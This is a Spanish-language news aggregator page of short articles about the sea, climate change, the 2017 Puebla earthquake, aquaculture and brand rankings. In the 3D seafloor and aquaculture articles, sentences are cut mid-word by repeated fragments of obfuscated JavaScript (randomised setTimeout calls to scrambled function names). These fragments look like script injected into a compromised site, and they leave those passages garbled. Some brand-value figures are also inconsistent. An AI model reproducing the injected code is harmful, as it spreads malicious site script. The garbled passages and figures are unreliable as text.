Etiquetas: Mar


(Video) Advierten graves consecuencias del cambio climático 

11 octubre, 2018

Ciudad de México. Los efectos del cambio climático se están viendo reflejados en el aumento de la temperatura del mar, con lo que se alterarán los patrones de evaporación superficial, las circulaciones de las corrientes marinas, la fisiología de los organismos invertebrados, con la consecuente alteración y muerte de los corales y el impacto sobre la cadena alimentaria que sostiene la vida en los mares.

Los impactos más visibles y directos del cambio climático se notan en algunos ecosistemas costeros, en particular en las lagunas de manglar y los arrecifes coralinos.

Fuente: AlMomento.Mx


Destacan Google, Apple y Amazon entre las 100 marcas con mayor crecimiento 

15 septiembre, 2018

México. Por primera vez en la historia, Google, Apple, Amazon, Microsofty Tencent y Facebook se ubican entre las 100 marcas más valiosas que durante 2018 registraron su mayor crecimiento, de acuerdo con el reporte y ranking BrandZ Top 100 Global.

La firma apuntó que estas marcas globales más valiosas registraron un crecimiento de acuerdo con BrandZ Top 100 Global, pasando de 750 mil millones de dólares (más 21 por ciento) a 4.4 billones de dólares (204 por ciento) desde su publicación en 2006.

En un comunicado, señaló que lo que marcó la diferencia fue el aprovechamiento de las nuevas tecnologías como el uso de datos, tecnologías de Intelligence-lead marketing combinadas con enfoques de marketing creativos, pues contribuyeron a que las grandes marcas lograran un perfecto entendimiento con sus consumidores.

El vicepresidente de Kantar Millward Brown, empresa encargada del Top 100 de marcas globales BrandZ TM, Fernando Álvarez, indicó que “la tecnología está presente en todas las marcas del ranking, no hay una que no tenga un componente digital en su oferta, en su comunicación, en sus procesos de venta”.

Un reflejo de lo anterior es que ocho de cada 10 marcas son de tecnología o relacionadas con ella, donde Google, con 302 mil 063 millones de dólares y un crecimiento en valor de 23 por ciento, domina el ranking, seguido por Apple con 300.5 millones de dólares y un crecimiento de 28 por ciento.

Por su parte, Amazon pasó al lugar número tres con un crecimiento de 49 por ciento y un valor de 207.5 millones de dólares, superando al gigante Microsoft que con notable crecimiento en su valor de marca de 40 por ciento, que se ubicó en el cuarto lugar.

Por primera vez las marcas chinas lograron los mayores crecimientos, y la que más creció fue JD.com, con el lugar número 59 y un asombroso aumento de 94 por ciento en valor, gracias a que incursionó en nuevas categorías como finanzas, seguida por Alibaba.

El BrandZ Top 100 incluye siete marcas asiáticas (excluyendo China), las cuales crecieron 14 por ciento, dándoles un valor total de 146 mil millones de dólares.

Además hay nuevas marcas que ingresan al Top 100 como el gigante de las telecomunicaciones Spectrum, en la posición número 27; Uber, en el lugar número 81; Instagram en el 91; el banco BCA de Indonesia en el 99, y Adidas en la posición número 100.

Fuente: Notimex


Advierten catástrofe; derretimiento en la Antártida aumentaría niveles del mar 

14 junio, 2018

Londres. Si no se hace nada para detener el derretimiento masivo del hielo marino en la Antártida, los niveles del mar aumentarán y todos los países costeros podrían verse seriamente amenazados por las inundaciones, alertó un equipo de científicos que han estudiando ese territorio durante décadas.

En la edición de la revista Nature, los especialistas están proponiendo dos escenarios, uno desalentador, y otros prometedor, para lo que podría suceder en 2070

Los científicos, nueve de ellos han ganado el Premio Tinker-Muse para Ciencia y Política en la Antártida, plantean escenarios de lo que podría suceder si el mundo no hace nada en los próximos 10 años para detener la destrucción.

La Antártida está cubierta por capas de hielo que se canalizan hacia los océanos a través de una red de corrientes de hielo y glaciares. Recientemente, el continente ha visto una reducción en la extensión de las plataformas de hielo flotantes.

El océano Austral que rodea el continente es vital para la salud de todos los demás. Absorbe más calor y carbono que cualquier otro océano, y al hacerlo, ayuda a disminuir la velocidad con la que la atmósfera se está calentando.

La región también hace un servicio real al devolver las aguas profundas ricas en nutrientes a la superficie, y exporta estos nutrientes a latitudes más bajas que dependen de ellos para mantener la vida en nuestros mares.

El agujero en el ozono , que se centra en esta región, es causado en parte por la liberación de clorofluorocarbonos que provienen de su aire acondicionado, latas de aerosol, solventes, refrigeración y otros procesos de fabricación.

El orificio permite demasiada luz ultravioleta, lo que contribuye a temperaturas más altas. Un viento más fuerte en el oeste, también debido al cambio climático, daña el hielo marino.

El aumento de la acidez del océano, un problema que se ve en todo el mundo debido a la mayor cantidad de dióxido de carbono de la contaminación, también daña a los animales que viven en las aguas y puede causar algunos problemas reproductivos con los peces.

En el primer escenario presentado en el nuevo informe, si nadie hace nada para reducir las emisiones de gases de efecto invernadero y el planeta continúa calentándose, el océano Austral y la Antártida podrían ver un gran derretimiento.

Aproximadamente una cuarta parte del volumen del hielo marino probablemente desaparecerán en 2070, eso está por encima de la tasa récord en la que el continente ya está perdiendo hielo marino.

Se cree que la Antártida ha perdido un promedio de 71 mil millones a 53 mil millones de toneladas métricas de hielo por año entre 1992 y 2011, según un nuevo estudio. Si el hielo marino se derrite, eso significaría un aumento en los niveles del mar en todo el mundo.

En el peor de los casos, para el año 2070, el mar probablemente se elevaría a aproximadamente medio metro de donde estaba en 2000.

Las costas de Estados Unidos probablemente verían un aumento del nivel del mar aún mayor, lo que causaría estragos y sería irreversible, además de cuantiosos daños materiales estimados en miles de millones de dólares

En este escenario, la temperatura promedio aumentaría alrededor de 3.5 grados Celsius. Las Naciones Unidas consideran que un aumento de dos grados es “catastrófico”.

El agua en el Océano Austral podría volverse corrosiva para cualquier animal con caparazón. El océano más cálido crearía más icebergs, que deberían vigilarse cuidadosamente para proteger la pesca, el transporte marítimo y el turismo.

La pesca sería más difícil, ya que las poblaciones de peces disminuirían. Habría severas disminuciones de pingüinos y otras muertes de aves marinas y focas.

El estudio, en el cual participaron 88 científicos, es el segundo de una serie de evaluaciones previstas con intervalos de varios años por un equipo de científicos que colaboran con la NASA y la Agencia Espacial Europea.

A diferencia de otros estudios basados en una medición única, este equipo mide la pérdida de hielo con entre 10 y 15 satélites, además de tomar mediciones en tierra y realizar simulaciones informáticas, dijo el autor principal, Andrew Shepherd, de la Universidad de Leeds en Inglaterra.

Para el año 2070, si el mundo trabajara en conjunto y convirtiera la contaminación en una prioridad, limitando los gases de efecto invernadero, el segundo escenario predice que existe la posibilidad de que la Antártida se parezca mucho a lo que es ahora.

Fuente: Notimex


Sismo del 19-S, un movimiento de provino del fondo del mar

13 abril, 2018

México. Xyoli Pérez Campos cruzaba los torniquetes de salida del Metro Universidad cuando sonó la alerta sísmica. De inmediato supo que un sismo se acercaba y que debía tomar las precauciones necesarias. Caminó junto con los otros viajeros del Metro hacia las escaleras que conducen a la calle, pero antes de que pudiera ponerse a salvo, el movimiento de la tierra se intensificó y a Xyoli Pérez, jefa del Servicio Sismológico Nacional, no le quedó duda: estaba ocurriendo un sismo que tendría un fuerte impacto en la Ciudad de México.

Una vez que la tierra dejó de moverse, una sola idea cruzó por la mente de la sismóloga: corre. En el trayecto del Metro a su oficina sonó su radio portátil: el sismo tenía una magnitud preliminar mayor de siete.

Xyoli Pérez llegó en menos de cinco minutos a su oficina, tenía que avisar a las autoridades y asegurarse de cumplir todos los protocolos establecidos para responder a un sismo de tal magnitud.

Después de un sismo

El sismo del 19 de septiembre de 2017 comenzó a las 13 horas con 14 minutos de un martes. Al Servicio Sismológico Nacional le tomó menos de cinco minutos conocer la magnitud, la localización y el hipocentro del sismo: 7.1, a 12 kilómetros al suroeste de Axochiapan, Morelos, y a 57 kilómetros de profundidad.

Quince minutos después, Xyoli Pérez y su equipo ya sabían que el sismo había sido un sismo de mecanismo normal, un tipo de sismo que se origina cuando una placa tectónica, que se dobla bajo un país, se rompe. Llegaron a esta conclusión al analizar los datos de diferentes gráficas, denominadas sismogramas, que registraron la velocidad, la intensidad y el tipo de ondas que sacudieron la tierra.

Los sismogramas, que evocan electrocardiogramas del planeta, les permiten realizar representaciones simples de lo que ocurrió en las profundidades: qué tipo de falla o ruptura ocurrió en las placas tectónicas y si la ruptura ocasionó movimientos de lado a lado o de arriba hacia abajo.

Pero después de un sismo como el del 19 de septiembre, en el que más de 46 estructuras colapsaron en la capital del país y más de 350 personas perdieron la vida, era necesario hacer modelos detallados de lo ocurrido y obtener la mayor cantidad de información posible. Con la información, Xyoli Pérez quería responder a dos preguntas que le rondaban por la cabeza después de la catástrofe: ¿qué tan probable es que un sismo como este vuelva a ocurrir? y, ¿podría pasar aún más cerca de la Ciudad de México?

El doblez de una enorme plancha de rocas

En las costas del Pacífico mexicano, dos gigantes de roca se encuentran: la placa de Cocos y la placa de Norteamérica. La interacción entre estas dos placas tectónicas ocasiona la mayoría de los sismos en el país.

Cuando las placas chocan, la fuerza de la colisión puede ocasionar un sismo, pero la interacción no termina allí. Después del choque, la placa de Cocos se dobla 15 grados hacia el interior de la Tierra, en seguida se endereza y comienza a desplazarse en posición horizontal debajo de la placa de Norteamérica.

La placa continúa moviéndose debajo de la superficie del país por otros 200 kilómetros, el roce de este deslizamiento profundo puede seguir generando sismos de menor magnitud, hasta que el recorrido de la placa termina.

Cerca de los estados de Puebla y Morelos, la placa de Cocos se dobla abruptamente en un ángulo de 75 grados hacia el centro del planeta. El doblez de la plancha de roca de casi ocho kilómetros de espesor crea una tensión enorme y puede llegar el momento en que las fuerzas sobre la placa sobrepasan su capacidad de flexión y la rompan, haciendo vibrar la tierra y generando sismos como el del 19 de septiembre del año pasado, que ahora es conocido como un sismo de flexión.

Los sismólogos conocen de estos dobleces en la placa de Cocos gracias al estudio de sismos lejanos o telesismos. Las ondas sísmicas que vienen de Japón, Fiji, Chile o Alaska, y cruzan por debajo de la tierra, chocan con la placa de Cocos, creando nuevas ondas, cuya forma da una idea a los científicos del relieve que tiene la placa bajo el continente. Gracias a esto, los científicos saben que la placa de Cocos se flexiona debajo de los estados de Colima, Michoacán, Guerrero, Puebla, Morelos, Estado de México, Oaxaca y Chiapas y, por lo tanto, esos son los estados que podrían estar en riesgo de sufrir un sismo de flexión.

Pero en los últimos 100 años solo han ocurrido cinco sismos en la zona de flexión de la placa de Cocos cercana a la Ciudad de México, y todos en una sola región: al sureste del estado de Puebla, cerca del municipio de Tehuacán.

Así que Xyoli Pérez y sus colegas se preguntaron si el área podía tener características especiales que la volvieran más susceptible a sufrir ese tipo de sismos. La respuesta a esta pregunta la encontrarían escrita en el fondo del mar.

La impotencia de la lejanía

El 19 de septiembre a la una de la tarde, Diego Melgar hablaba por teléfono con un colega del Centro de Ciencias de la Atmósfera de la Universidad Nacional Autónoma de México (UNAM). Se ponían de acuerdo sobre lo que les faltaba por hacer para terminar un análisis del sismo de 8.2 que unos días antes, el 7 de septiembre, había azotado la región de Tehuantepec ocasionando la muerte de aproximadamente 100 personas.

Tiene menos de 30 años que la humanidad conoce a detalle el relieve del fondo marino. La conversación no finalizó, pues a la una con catorce minutos, Diego Melgar escuchó a su compañero decir “cabrón, está temblando” y la llamada se cortó. Segundos después, un mensaje de su hermana, lo confirmó.

Toda su familia vive en Morelos y Diego Melgar, que trabaja como profesor de geofísica en la Universidad de Oregón, sintió la impotencia de no saber lo que le ocurriría a sus seres queridos.

“Un momento después me enteré que el sismo era magnitud 7 y por el lugar en donde se originó supe que iba a ser feo, porque era intenso y estaba cerca de ciudades grandes: de Cuernavaca, de Puebla y de la Ciudad de México. Lo primero que pensé fue que iba a ser tan malo como el del 85, afortunadamente me equivoqué… aun así hubo muchos daños humanos y materiales”.

Un mes después, Diego Melgar se unió con Xyoli Pérez y con otros cinco científicos para crear un modelo detallado del terremoto y averiguar si este tipo de sismos podría volver a ocurrir más cerca de la Ciudad de México.

Los investigadores comenzaron estudiando las características de la placa de Cocos, y observando imágenes del fondo marino notaron que la rugosidad de la placa, antes de su choque y su ingreso a las profundidades del país, tenía una alineación parecida a las rayas en el pavimento de una banqueta o a las vetas en una tabla de madera. Estas rayas, formadas por surcos en el suelo oceánico, podían volverla más frágil y aumentar sus posibilidades de ruptura al llegar al punto de flexión en el centro de México.

Huellas en el fondo del mar

La placa de Cocos nace en el fondo del océano Pacífico, de un surco en suelo marino llamado dorsal. De él brota magma y material ardiente del manto terrestre, que al entrar en contacto con el agua se enfría y forma nueva corteza terrestre. Poco a poco las nuevas rocas van desplazando a las rocas de mayor antigüedad y provocan el movimiento de las placas tectónicas.

Cuando la roca líquida brota de la dorsal, forma estructuras características en la placa de Cocos: cordilleras montañosas seguidas por profundos abismos. Estas estructuras se alinean una detrás de la otra y la placa de Cocos queda con un relieve rayado, que Diego, Xyoli y sus colaboradores comparan con las vetas de una tabla de madera.

Estas alineaciones no cambian, se van recorriendo junto con la placa, explica Diego Melgar, y de unos ocho a diez millones de años después llegan a las costas mexicanas.

Lo que los investigadores observaron fue que estas estrías formadas por montañas y abismos podían alinearse con el abrupto doblez de la placa y aumentar las probabilidades de una fractura y de un sismo de flexión.

Donde los abismos se alinean

Cuando una persona dobla una tabla de forma perpendicular a sus vetas, necesitará aplicar más fuerza para romperla que si la dobla de manera paralela a las vetas. Esto mismo sucedería en la placa de Cocos, si un largo abismo se alinea con el doblez debajo del centro de México, será más fácil que la placa se rompa.

La hipótesis de la alineación puede explicar por qué la placa de Cocos se rompe con mayor frecuencia en algunas zonas del doblez. Los investigadores proponen que cuando el ángulo que se forma entre las estrías y el doblez de la placa es menor que 30 grados, existe mayor riesgo de que la placa se rompa.

Con esta suposición, Diego Melgar elaboró un mapa en el que analizó cómo se alineaban el doblez y la rugosidad de la placa de Cocos debajo de las diferentes regiones del país, y notó que entre la frontera de Michoacán y Guerrero, la rugosidad no se alinea con el doblez, mientras que en la frontera entre Puebla y Oaxaca hay una alineación casi perfecta. Esto coincide con la ausencia de sismos de flexión en la región de Michoacán y Guerrero y con la concentración de los sismos de flexión en el estado de Puebla.

Un sismo más cerca de la Ciudad de México

El mapa de Diego Melgar apunta a que sismos como el del pasado 19 de septiembre pueden volver a ocurrir y pueden suceder unos kilómetros más cerca de la Ciudad de México.

Aunque hay que considerar que la coincidencia de 30 grados que se estableció no es un número exacto, todavía faltan por estudiar muchos aspectos de esta hipótesis, señala el investigador.

Los sismólogos aún tienen que estudiar características que les ayuden a explicar por qué algunas alineaciones se rompen y otras no. Deben estudiar la composición del suelo, qué tan compacta se encuentra la roca en la placa, la longitud de las alineaciones, el acomodo de las alineaciones circundantes y la dirección de las tensiones que sufre la placa. Como dice Xyoli Pérez, cuando alguien dobla una tabla de madera, no se va a romper en cada una de sus vetas, una de ellas tendrá las condiciones específicas y solo esa será la que se rompa.

Además, los investigadores tienen que considerar que la hipótesis de la alineación de la rugosidad y el doblez de la placa hace una suposición: que la dirección de las cordilleras montañosas y los abismos en la placa de Cocos no ha cambiado mucho en los últimos 10 millones de años.

Esta suposición es válida porque el mecanismo geológico de formación y desplazamiento de las placas tectónicas es muy lento, se necesitan decenas de millones de años para que se se aprecie una rotación de las placas tectónicas, aun así, sigue siendo una suposición y se tiene que estudiar más este aspecto, explica Xyoli Pérez.

Lejos de una predicción

Hasta donde los investigadores tienen entendido, la coincidencia entre la dirección del relieve y la dirección de la flexión de una placa no se habían relacionado antes con los sismos de flexión.

“Ahora viéndolo en retrospectiva probablemente otros sismos que han ocurrido en México tuvieron el mismo mecanismo. Por ejemplo, el sismo de Tehuacán en 1999, que casi destruyó por completo la iglesia del lugar; también en el 80 hubo otro sismo muy similar cerca de allí y ahora decimos, claro, es el mismo mecanismo”, comenta Diego Melgar.

Aún no contamos con la historia suficiente para saber cada cuánto tiempo puede ocurrir este tipo de sismos, comenta Diego Melgar. La invención del sismógrafo tiene apenas 175 años y en México las primeras estaciones sismológicas no se establecieron hasta 1905. Desde entonces hasta la fecha no se han registrado más de seis sismos de flexión en esta región del país.

Esto permitirá elaborar mapas de peligro, pues sismos de flexión en sitios al noreste del epicentro del terremoto del 19 de septiembre de 2017 son menos probables, pero al sureste la probabilidad aumenta. Y aunque este es un avance importante, los sismólogos aún están lejos de poder realizar una predicción de cada cuánto tiempo ocurre este tipo de sismos.

“Ojalá que en un siglo o dos ya sepamos mejor lo que sucede bajo los pies de los mexicanos”.

Grandes sismos, grandes lecciones

Para Diego Melgar, lo más importante de este trabajo, que fue publicado en la revista científica Geophysical Research Letters, es que establece un mecanismo físico para explicar por qué ocurren sismos de flexión en la frontera entre Puebla y Oaxaca, y por qué no ocurren en otras partes al interior del país.

Pero Xyoli y Diego concuerdan en que la investigación no solo aporta en el campo de la geofísica, sino también en el campo de las ciencias sociales, pues pone sobre la mesa la vulnerabilidad de algunos de los centros de población más grandes en el país y la necesidad de tomar acciones al respecto.

Aunque los sismos son más comunes y más fuertes en las costas del Pacífico, los sismos en el centro del país que ocurren muy cerca de las ciudades de Toluca, Puebla, Cuernavaca o la Ciudad de México, ponen en peligro a una mayor cantidad de personas.

“Una de nuestras preocupaciones y el origen de este trabajo fue: ¿qué tan cerca de la Ciudad de México puede ocurrir este tipo de sismos? Y la respuesta fue que pueden ocurrir aún más cerca. Esto debe volvernos conscientes de que esta zona tiene ese potencial sísmico y que no debemos descuidarla en ningún aspecto, ni en términos de investigación, que nos corresponde a los científicos, ni en términos de prevención, que nos corresponde a todos los ciudadanos y al gobierno”.

Fuente: AlMomentoMX


Mundo marino se podrá explorar en 3D

20 septiembre, 2017

México. Con la finalidad de no extraer piezas del mundo marino que afecten al ecosistema, los científicos han adoptado la tecnología 3D para realizar sus investigaciones acerca de las especies de animales y plantas.
La Universidad del Mar (Umar) se sumó a este tipo de proyectos de modelación tridimensional que buscarán imprimir el fondo marino de las bahías de Huatulco, Oaxaca.

El maestro Eduardo Ramírez Chávez, experto en biología marina e investigador de la Umar inició el proceso por medio de la fotogrametría marina, es decir, con cámaras fotográficas de alta resolución en un vehículo de operación remota.

Explicó que el proceso para llegar al modelo tridimensional comienza con la toma de una serie de fotografías desde un vehículo submarino operado a distancia (ROV) para generar un mosaico de imágenes y después la impresión tridimensional o modelo virtual.

“Mientras avanza, va tomandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o fotos cada cinco segundos, mismas que se toman desde un ángulo de 90 grados. A continuación, por medio de buceo libre, tomamos fotografías desde un ángulo de 45 grados, llegandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o a un total aproximado de 500 fotografías por cada muestreo”.

Detalló a la Agencia Informativa Conacyt que el proyecto es una propuesta para conocer la biodiversidad asociada al entorno y eliminar la antigua práctica que consistía en la extracción para obtener información ecológica.

Agregó que la modelación física y virtual tiene además fines educativos, pues Eduardo Ramírez pretende mostrar los modelos a niños y jóvenes para que conozcan los entornos submarinos a los que no podrían acceder de manera sencilla.

En la actualidad la modelación tridimensional también se lleva a cabo en el Golfo de México, en un proyecto dirigido por el doctor Javier Bello Pineda, investigador del Instituto de Ciencias Marinas y Pesqueras de la Universidad Veracruzana.

Fuente: Notimex


Atiende Marina desplome de helicóptero en el mar

3 agosto, 2017

México. La Secretaría de Marina–Armada de México (Semar) realizó una evacuación médica vía aérea de dos tripulantes del buque atunero “Conquista”, quienes sufrieron un accidente a bordo de un helicóptero tipo Robinson.

En un comunicado, señaló que como Autoridad Marítima Nacional y en funciones de Guardia Costera, la víspera acudieron a la llamada de auxilio efectuada por la Capitanía Regional de Puerto Chiapas.

Solicitaban el apoyo de una aeronave para desarrollar la evacuación médica de dos personas de sexo masculino, quienes se encontraban gravemente heridas por el desplome de un helicóptero tipo Robison, al sobrevolar el área para desarrollar actividades propias de pesca.

Así, se instruyó a la Patrulla Oceánica de la Armada de México ARM. Durango (PO-151), desplegar un helicóptero Panther con elementos de sanidad naval para rescate de las personas a 370 kilómetros al Sureste de Puerto Chiapas, en Chiapas.

Aunque los heridos fueron trasladados a bordo de la unidad aérea de la Semar a la Base Aeronaval de Tapachula, para que fueran atendidos en un Hospital de la Región, uno de los dos tripulantes falleció durante su traslado, debido a la gravedad de las heridas y golpes sufridos en el accidente.

La Secretaría de Marina reiteró su compromiso con la sociedad mexicana, de cumplir con la misión que tiene encomendada por ley, en lo referente a proteger y salvaguardar la vida humana en la mar.

Fuente: Notimex


Garantizaría la acuicultura alimentos de mar en los próximos años

23 junio, 2017

México. Para 2050, México deberá aumentar su producción de especies pesqueras en 60 por ciento si desea abastecer la demandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a alimentaria que tendrá la población, afirmó la investigadora María Piedad Sánchez.

De ahí que la doctora en biología propone la acuicultura, una técnica de cultivo de organismos acuáticos tanto de zonas costeras como de aguas continentales, que implica intervenciones en el proceso de cría para aumentar la producción.

De acuerdo con la experta, este método podría abastecer a la población de sus necesidades nutrimentales y proteínas de origen animal, reduciendo la sobreexplotación en mares y desembocaduras.

“El reto que tiene ahora la acuicultura es la diversificación, es decir, que haya más especies para comercializar. Con tecnología se puede ofrecer al consumidor un mejor producto, con mayor nivel nutricional y valor agregado de seguridad e inocuidad, ya que los organismos en cautiverio están vacunados, tratados con agua limpia”, sostuvo.

La investigadora del Instituto de Ciencias Marinas y Pesquerías de la Universidad Veracruzana dijo que existe una gran oportunidad de mercado, toda vez que en el país sólo se explotan 12 de las 600 especies que se cultivan en el mundo.

“Estudiar la biología de cada especie nos ayuda a crear las condiciones óptimas para su adecuado desarrollo, es importante conocer las condiciones de luz, profundidad, salinidad, temperatura, en las que se debe mantener para conseguir especímenes competitivos en el mercado”, resaltó.

María Piedad Sánchez reiteró a la Agencia Informativa Conacyt que la investigación científica brinda herramientas para aumentar la calidad de los alimentos, pues  se obtiene mayor control y eficacia al momento de su producción.

Según la Comisión Nacional de Acuacultura y Pesca (Conapesca), en México existen 115 mil 910 hectáreas dedicadas a la producción de especies en condiciones controladas, principalmente de tilapia, camarón, moluscos, peces, bagre y trucha. Y se espera que para 2018 se alcance una producción nacional de 394 mil toneladas de peces, mediante el uso de este procedimiento. 

Fuente: Notimex


Sector marítimo impulsa desarrollo de México y lo proyecta al futuro: EPN

1 junio, 2017

México. Durante 2016, se extrajeron de los mares mexicanos 1.7 millones de toneladas de alimentos, que equivalen a 23 mil millones de pesos, cifra histórica en el país, destacó el presidente Enrique Peña Nieto, quien aseguró que “el desarrollo de México y su proyección hacia el futuro pasa por el impulso de nuestro sector marítimo”.

Durante el acto conmemorativo por el Día de la Marina, efectuado en Lázaro Cárdenas, Michoacán, enfatizó que “en 100 años, los marinos y tripulaciones de la marina mercante, pesquera y turística, han sido protagonistas de nuestra historia”, y refirió que a partir del 17 de junio, la Secretaría de Marina-Armada de México (Semar) asumirá entre sus funciones el carácter de Autoridad Marítima Nacional.

Con una ubicación geográfica privilegiada, la historia y el desarrollo de México han estado estrechamente relacionados con los mares y las costas mexicanos, pues “para los mexicanos, nuestros mares han sido sinónimo de riqueza, fortaleza y oportunidades”, resaltó el jefe del Ejecutivo federal, y aseguró que “los marinos mexicanos siempre han llevado a México hacia nuevos y mejores horizontes”.

Fuente: Notimex